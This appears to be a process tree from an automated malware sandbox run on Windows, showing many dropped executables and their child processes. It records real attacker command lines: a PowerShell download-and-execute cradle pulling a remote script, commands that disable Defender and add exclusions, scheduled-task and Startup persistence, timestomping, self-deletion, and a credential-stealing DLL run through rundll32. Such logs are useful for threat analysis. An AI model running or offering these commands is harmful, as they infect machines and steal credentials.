        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-extensions-http-throttling --first-renderer-process --disable-background-timer-throttling --disable-breakpad --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3244 --field-trial-handle=2036,i,3573216929238625543,3791578305298733045,131072 /prefetch:1
        5⤵
        
        PID:3368
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-audio-output --noerrdialogs --mojo-platform-channel-handle=4476 --field-trial-handle=2036,i,3573216929238625543,3791578305298733045,131072 /prefetch:8
        5⤵
        
        PID:2808
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-extensions-http-throttling --disable-background-timer-throttling --disable-breakpad --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4332 --field-trial-handle=2036,i,3573216929238625543,3791578305298733045,131072 /prefetch:1
        5⤵
        
        PID:4964
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-audio-output --noerrdialogs --mojo-platform-channel-handle=4620 --field-trial-handle=2036,i,3573216929238625543,3791578305298733045,131072 /prefetch:8
        5⤵
        
        PID:5132
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-audio-output --noerrdialogs --mojo-platform-channel-handle=4472 --field-trial-handle=2036,i,3573216929238625543,3791578305298733045,131072 /prefetch:8
        5⤵
        
        PID:5228
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-audio-output --noerrdialogs --mojo-platform-channel-handle=4924 --field-trial-handle=2036,i,3573216929238625543,3791578305298733045,131072 /prefetch:8
        5⤵
        
        PID:5292
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --disable-audio-output --noerrdialogs --mojo-platform-channel-handle=4552 --field-trial-handle=2036,i,3573216929238625543,3791578305298733045,131072 /prefetch:8
        5⤵
        
        PID:5792
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=utility --disable-audio-output --noerrdialogs --mojo-platform-channel-handle=4900 --field-trial-handle=2036,i,3573216929238625543,3791578305298733045,131072 /prefetch:8
        5⤵
        
        PID:5964
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --disable-audio-output --noerrdialogs --mojo-platform-channel-handle=4516 --field-trial-handle=2036,i,3573216929238625543,3791578305298733045,131072 /prefetch:8
        5⤵
        
        PID:6092
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-audio-output --noerrdialogs --mojo-platform-channel-handle=4496 --field-trial-handle=2036,i,3573216929238625543,3791578305298733045,131072 /prefetch:8
        5⤵
        
        PID:4168
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=utility --disable-audio-output --noerrdialogs --mojo-platform-channel-handle=4360 --field-trial-handle=2036,i,3573216929238625543,3791578305298733045,131072 /prefetch:8
        5⤵
        
        PID:3924
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-audio-output --noerrdialogs --mojo-platform-channel-handle=5020 --field-trial-handle=2036,i,3573216929238625543,3791578305298733045,131072 /prefetch:8
        5⤵
        
        PID:2992
- C:\Users\Admin\AppData\Local\Temp\a\HHGgG.exe
  "C:\Users\Admin\AppData\Local\Temp\a\HHGgG.exe"
  2⤵
  PID:3328
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:2660
- C:\Users\Admin\AppData\Local\Temp\a\1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\1.exe"
  2⤵
  PID:3640
- C:\Users\Admin\AppData\Local\Temp\a\cache_cleaner.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cache_cleaner.exe"
  2⤵
  PID:4908
- C:\Users\Admin\AppData\Local\Temp\a\w-9.exe
  "C:\Users\Admin\AppData\Local\Temp\a\w-9.exe"
  2⤵
  PID:5592
- C:\Users\Admin\AppData\Local\Temp\a\foto124.exe
  "C:\Users\Admin\AppData\Local\Temp\a\foto124.exe"
  2⤵
  PID:5200
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x5858224.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x5858224.exe
    3⤵
    PID:5272
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x6255270.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x6255270.exe
      4⤵
      PID:5368
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\f3768758.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\f3768758.exe
        5⤵
        
        PID:5700
- C:\Users\Admin\AppData\Local\Temp\a\fotod25.exe
  "C:\Users\Admin\AppData\Local\Temp\a\fotod25.exe"
  2⤵
  PID:5732
- - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y1788316.exe
    C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y1788316.exe
    3⤵
    PID:5600
  - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y2018257.exe
      C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y2018257.exe
      4⤵
      PID:5928
    - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\k6447820.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\k6447820.exe
        5⤵
        
        PID:5980
    - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\l7831112.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\l7831112.exe
        5⤵
        
        PID:5696
- C:\Users\Admin\AppData\Local\Temp\a\secmorganzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\secmorganzx.exe"
  2⤵
  PID:5896
- C:\Users\Admin\AppData\Local\Temp\a\eee23xe.exe
  "C:\Users\Admin\AppData\Local\Temp\a\eee23xe.exe"
  2⤵
  PID:6028
- - C:\Users\Admin\AppData\Local\Temp\a\eee23xe.exe
    "C:\Users\Admin\AppData\Local\Temp\a\eee23xe.exe"
    3⤵
    PID:5248
- C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe"
  2⤵
  PID:5820
- C:\Users\Admin\AppData\Local\Temp\a\Dollar.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Dollar.exe"
  2⤵
  PID:2108
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:4328
- C:\Users\Admin\AppData\Local\Temp\a\H2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\H2.exe"
  2⤵
  PID:5332
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:756
- C:\Users\Admin\AppData\Local\Temp\a\2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\2.exe"
  2⤵
  PID:5016
- C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe"
  2⤵
  PID:5416
- - C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe"
    3⤵
    PID:2192
- C:\Users\Admin\AppData\Local\Temp\a\cc.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cc.exe"
  2⤵
  PID:4344
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4344 -s 924
    3⤵
    - Program crash
    PID:6244
- C:\Users\Admin\AppData\Local\Temp\a\WindowsApp1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\WindowsApp1.exe"
  2⤵
  PID:5556
- C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe"
  2⤵
  PID:6040
- - C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe
    "C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe"
    3⤵
    PID:3428
- C:\Users\Admin\AppData\Local\Temp\a\M.exe
  "C:\Users\Admin\AppData\Local\Temp\a\M.exe"
  2⤵
  PID:4800
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:4100
- C:\Users\Admin\AppData\Local\Temp\a\ga.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ga.exe"
  2⤵
  PID:5392
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:5236
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:5468
- C:\Users\Admin\AppData\Local\Temp\a\Nano.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Nano.exe"
  2⤵
  PID:1188
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:5280
- C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe"
  2⤵
  PID:5232
- - C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe"
    3⤵
    PID:6596
- - C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe"
    3⤵
    PID:6344
- C:\Users\Admin\AppData\Local\Temp\a\smss.exe
  "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
  2⤵
  PID:64
- - C:\Users\Admin\AppData\Local\Temp\a\smss.exe
    "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
    3⤵
    PID:5256
- C:\Users\Admin\AppData\Local\Temp\a\R.exe
  "C:\Users\Admin\AppData\Local\Temp\a\R.exe"
  2⤵
  PID:5364
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:5100
- C:\Users\Admin\AppData\Local\Temp\a\ar.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ar.exe"
  2⤵
  PID:5448
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:4228
- C:\Users\Admin\AppData\Local\Temp\a\ARR.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ARR.exe"
  2⤵
  PID:5848
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:5844
- C:\Users\Admin\AppData\Local\Temp\a\D.exe
  "C:\Users\Admin\AppData\Local\Temp\a\D.exe"
  2⤵
  PID:4368
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:4624
- C:\Users\Admin\AppData\Local\Temp\a\NEV.exe
  "C:\Users\Admin\AppData\Local\Temp\a\NEV.exe"
  2⤵
  PID:880
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:3952
- C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe"
  2⤵
  PID:3024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe
    3⤵
    PID:2156
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 0
      4⤵
      PID:4972
- C:\Users\Admin\AppData\Local\Temp\a\jokerzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\jokerzx.exe"
  2⤵
  PID:5388
- - C:\Users\Admin\AppData\Local\Temp\a\jokerzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\jokerzx.exe"
    3⤵
    PID:4692
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1336
    3⤵
    - Program crash
    PID:5792
- C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe"
  2⤵
  PID:672
- - C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe"
    3⤵
    PID:5308
- C:\Users\Admin\AppData\Local\Temp\a\wasx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\wasx.exe"
  2⤵
  PID:3984
- - C:\Users\Admin\AppData\Local\Temp\a\wasx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\wasx.exe"
    3⤵
    PID:5036
- C:\Users\Admin\AppData\Local\Temp\a\dd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\dd.exe"
  2⤵
  PID:6008
- - C:\Users\Admin\AppData\Local\Temp\a\dd.exe
    "C:\Users\Admin\AppData\Local\Temp\a\dd.exe"
    3⤵
    PID:5708
- C:\Users\Admin\AppData\Local\Temp\a\postmon.exe
  "C:\Users\Admin\AppData\Local\Temp\a\postmon.exe"
  2⤵
  PID:4320
- - C:\Windows\System32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1')"
    3⤵
    PID:412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command IEX(New-Object Net.Webclient).DownloadString('https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1')
      4⤵
      PID:5332
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\a\postmon.exe" >> NUL
    3⤵
    PID:2428
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:7008
- C:\Users\Admin\AppData\Local\Temp\a\U2th5k1keGkDeMw.exe
  "C:\Users\Admin\AppData\Local\Temp\a\U2th5k1keGkDeMw.exe"
  2⤵
  PID:5588
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:7240
- C:\Users\Admin\AppData\Local\Temp\a\red.exe
  "C:\Users\Admin\AppData\Local\Temp\a\red.exe"
  2⤵
  PID:4832
- C:\Users\Admin\AppData\Local\Temp\a\Facebook.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Facebook.exe"
  2⤵
  PID:4028
- C:\Users\Admin\AppData\Local\Temp\a\photo430.exe
  "C:\Users\Admin\AppData\Local\Temp\a\photo430.exe"
  2⤵
  PID:3256
- - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\v7327186.exe
    C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\v7327186.exe
    3⤵
    PID:5364
  - - C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\v7709045.exe
      C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\v7709045.exe
      4⤵
      PID:1188
    - - C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\v4667378.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\v4667378.exe
        5⤵
        
        PID:4436
      - C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\a9588769.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\a9588769.exe
        6⤵
        
        PID:5948
      - C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\b0329967.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\b0329967.exe
        6⤵
        
        PID:6984
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:6524
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6984 -s 696
        7⤵
        Program crash
        
        PID:6736
    - - C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\c0594738.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\c0594738.exe
        5⤵
        
        PID:1220
- C:\Users\Admin\AppData\Local\Temp\a\fristname.exe
  "C:\Users\Admin\AppData\Local\Temp\a\fristname.exe"
  2⤵
  PID:1048
- - C:\Users\Admin\AppData\Local\Temp\ae3108e6c23af96b9aac776041f0203a.exe
    "C:\Users\Admin\AppData\Local\Temp\ae3108e6c23af96b9aac776041f0203a.exe"
    3⤵
    PID:6420
- - C:\Users\Admin\AppData\Local\Temp\BitDefendMS.exe
    "C:\Users\Admin\AppData\Local\Temp\BitDefendMS.exe"
    3⤵
    PID:6444
- - C:\Users\Admin\AppData\Local\Temp\Builtt.exe
    "C:\Users\Admin\AppData\Local\Temp\Builtt.exe"
    3⤵
    PID:6528
  - - C:\Users\Admin\AppData\Local\Temp\Builtt.exe
      "C:\Users\Admin\AppData\Local\Temp\Builtt.exe"
      4⤵
      PID:6740
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "net session"
        5⤵
        
        PID:5408
      - C:\Windows\system32\net.exe
        
        net session
        6⤵
        
        PID:5380
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        7⤵
        
        PID:6224
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:7156
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:7476
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:6656
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:7484
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        5⤵
        
        PID:5560
      - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        6⤵
        
        PID:7600
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        5⤵
        
        PID:4144
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
        6⤵
        
        PID:7816
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
        5⤵
        
        PID:7144
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        6⤵
        
        PID:7728
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builtt.exe'"
        5⤵
        
        PID:5616
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builtt.exe'
        6⤵
        
        PID:7856
- C:\Users\Admin\AppData\Local\Temp\a\IE_CACHE.exe
  "C:\Users\Admin\AppData\Local\Temp\a\IE_CACHE.exe"
  2⤵
  PID:5716
- C:\Users\Admin\AppData\Local\Temp\a\IMG_3360_103pdf.exe
  "C:\Users\Admin\AppData\Local\Temp\a\IMG_3360_103pdf.exe"
  2⤵
  PID:3024
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\IMG_3360_103pdf.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhosk.exe.exe'
    3⤵
    PID:6304
- - C:\Users\Admin\AppData\Local\Temp\a\IMG_3360_103pdf.exe
    "C:\Users\Admin\AppData\Local\Temp\a\IMG_3360_103pdf.exe"
    3⤵
    PID:6836
- C:\Users\Admin\AppData\Local\Temp\a\dhssdf.exe
  "C:\Users\Admin\AppData\Local\Temp\a\dhssdf.exe"
  2⤵
  PID:6200
- C:\Users\Admin\AppData\Local\Temp\a\d9ff4ed3.exe
  "C:\Users\Admin\AppData\Local\Temp\a\d9ff4ed3.exe"
  2⤵
  PID:6824
- C:\Users\Admin\AppData\Local\Temp\a\wall.exe
  "C:\Users\Admin\AppData\Local\Temp\a\wall.exe"
  2⤵
  PID:7060
- - C:\Users\Admin\AppData\Local\Temp\aafg31.exe
    "C:\Users\Admin\AppData\Local\Temp\aafg31.exe"
    3⤵
    PID:6264
- - C:\Users\Admin\AppData\Local\Temp\NewPlayer.exe
    "C:\Users\Admin\AppData\Local\Temp\NewPlayer.exe"
    3⤵
    PID:6732
  - - C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
      "C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe"
      4⤵
      PID:512
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:7080
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\6d73a97b0c" /P "Admin:N"&&CACLS "..\6d73a97b0c" /P "Admin:R" /E&&Exit
        5⤵
        
        PID:4728
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:7916
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "mnolyk.exe" /P "Admin:N"
        6⤵
        
        PID:7840
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "mnolyk.exe" /P "Admin:R" /E
        6⤵
        
        PID:7208
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:6900
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\6d73a97b0c" /P "Admin:N"
        6⤵
        
        PID:4744
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\6d73a97b0c" /P "Admin:R" /E
        6⤵
        
        PID:7592
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
        5⤵
        
        PID:4016
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
        6⤵
        
        PID:6828
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 6828 -s 596
        7⤵
        Program crash
        
        PID:364
- - C:\Users\Admin\AppData\Local\Temp\XandETC.exe
    "C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
    3⤵
    PID:6620
- C:\Users\Admin\AppData\Local\Temp\a\WWW3_64.exe
  "C:\Users\Admin\AppData\Local\Temp\a\WWW3_64.exe"
  2⤵
  PID:3948
- C:\Users\Admin\AppData\Local\Temp\a\gogw.exe
  "C:\Users\Admin\AppData\Local\Temp\a\gogw.exe"
  2⤵
  PID:6960
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN MicrosoftEdgeUpdateTaskMachineUARun.exe /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe"
    3⤵
    PID:6296
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN MicrosoftEdgeUpdateTaskMachineUARun.exe /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe
      4⤵
      Creates scheduled task(s)
      PID:6128
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "" "Set-ItemProperty -Path \"C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe\" -Name CreationTime -Value \"06/13/2022 3:16 PM\""
    3⤵
    PID:5096
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "" "Set-ItemProperty -Path \"C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe\" -Name LastWriteTime -Value \"06/13/2022 3:16 PM\""
    3⤵
    PID:4176
- C:\Users\Admin\AppData\Local\Temp\a\trust.exe
  "C:\Users\Admin\AppData\Local\Temp\a\trust.exe"
  2⤵
  PID:5128
- C:\Users\Admin\AppData\Local\Temp\a\aaa1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\aaa1.exe"
  2⤵
  PID:2832
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
    3⤵
    PID:6936
- C:\Users\Admin\AppData\Local\Temp\a\crypted.exe
  "C:\Users\Admin\AppData\Local\Temp\a\crypted.exe"
  2⤵
  PID:6368
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:2016
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:2812
- C:\Users\Admin\AppData\Local\Temp\a\netTime.exe
  "C:\Users\Admin\AppData\Local\Temp\a\netTime.exe"
  2⤵
  PID:2764
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
    3⤵
    PID:1512
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
    3⤵
    PID:5240
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2764 -s 996
    3⤵
    - Program crash
    PID:6096
- C:\Users\Admin\AppData\Local\Temp\a\tg.exe
  "C:\Users\Admin\AppData\Local\Temp\a\tg.exe"
  2⤵
  PID:6456
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
